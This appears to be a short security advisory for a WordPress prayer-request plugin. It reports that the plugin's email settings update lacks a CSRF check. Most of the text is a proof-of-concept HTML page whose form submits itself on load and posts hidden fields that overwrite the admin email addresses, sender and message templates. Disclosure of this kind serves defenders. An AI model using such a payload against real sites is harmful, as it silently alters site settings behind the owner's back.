Description The plugin does not have CSRF check in place when updating its email settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Have an admin open an HTML file containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/edit.php?post_type=prayers&page=pray-email-settings" method="post" enctype="multipart/form-data">
<input type="hidden" name="prayer_req_admin_email" value="csrf" />
<input type="hidden" name="prayer_admin_email_cc" value="csrf" />
<input type="hidden" name="prayer_email_from" value="csrf" />
<input type="hidden" name="prayer_email_user" value="csrf" />
<input type="hidden" name="prayer_email_req_subject" value="csrf" />
<input type="hidden" name="prayer_email_req_messages" value="csrf" />
<input type="hidden" name="prayer_email_admin_subject" value="csrf" />
<input type="hidden" name="prayer_email_admin_messages" value="csrf" />
<input type="hidden" name="emailsettings" value="Update" />
<input type="submit" value="submit" />
</form>
</body>
```